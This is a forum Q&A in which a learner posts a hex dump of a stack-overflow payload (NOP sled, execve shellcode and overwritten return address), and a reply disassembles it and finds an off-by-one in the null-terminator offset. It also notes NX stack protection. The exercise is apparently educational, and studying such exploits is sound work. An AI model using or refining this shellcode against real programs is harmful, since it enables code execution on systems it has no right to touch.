Running a file from shellcode

Question

I'm learning about stack exploitations using shellcode. I have everything organized, and my shellcode seems to work right up until the last instruction 0xcd 0x80. What is supposed to happen at the end of the shellcode is that the interrupt is sent (branching out of the shellcode) and a file is supposed to be executed that contains further instructions. If I type at the command line xxx/aa my file runs (the file is named simply aa and it is in a directory called xxx).

The byte representation of my insertion code is this:

0000000: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000010: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000020: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000030: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000040: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000050: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000060: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000070: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000080: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000090: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000a0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000b0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000c0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000d0: 9090 9090 eb16 5b31 c088 4307 895b 0889  ......[1..C..[..
00000e0: 430c b00b 8d4b 088d 530c cd80 e8e5 ffff  C....K..S.......
00000f0: ff78 7878 2f61 612f 7841 4141 4142 4242  .xxx/aa/xAAAABBB
0000100: 4241 4141 4114 f2ff bf0a                 BAAAA0....

And this both inserts my shellcode and perfectly places the new return address. However, when I run this code, I wind up in an infinite loop. The line 0xcd 0x80 is meant to send an interrupt and supply the argument xxx/aa, just as I type at the command line. However, rather than executing this line, the program just keeps going. Since the next line is a call back to the start of the shellcode, an infinite loop is created. Without the 0xcd 0x80 line to break out of the shellcode, there is no way out of this.

What am I doing wrong? How can I get this command line behavior to occur in my shell code. Thanks very much!

Answer 1

The disassembly of your code looks like this (here in AT&T syntax):

    jmp    pos2
pos1:
    pop    %ebx
    xor    %eax,%eax
    mov    %al,dbyte1-data(%ebx)
    mov    %ebx,dlong1-data(%ebx)
    mov    %eax,dlong2-data(%ebx)
    mov    $0xb,%al
    lea    dlong1-data(%ebx),%ecx
    lea    dlong2-data(%ebx),%edx
    int    $0x80
pos2:
    call   pos1
data:
    .ascii "xxx/aa/"
dbyte1:
    .byte  dont_care // ebx+dbyte1-data = ebx+7
dlong1:
    .long  dont_care // ebx+dlong1-data = ebx+8
dlong2:
    .long  dont_care // ebx+dlong2-data = ebx+0xC
    .byte  dont_care // "AAAA0"

First of all you can see that this code will run in an endless loop if the "execve" system call (I'm assuming 0xB is execve) will fail. Execve however will fail because "xxx/aa/" is not a valid file name. Seems the "mov %al,0x7(%ebx)" should really be "0x6(%ebx)".

As already written by "Giel" you may use the "strace" command to see if execve is really called with "xxx/aa/" instead of "xxx/aa" as file name.

Some note you should keep in mind for your next project (not for this one):

Most Linux executables have the "NX" bit set for the stack and data pages. This means that the CPU will not allow executing code from the stack or from data segments. This means that execution of shellcode would not work on most Linux programs but the program would be stopped with a bus exception or a similar exception.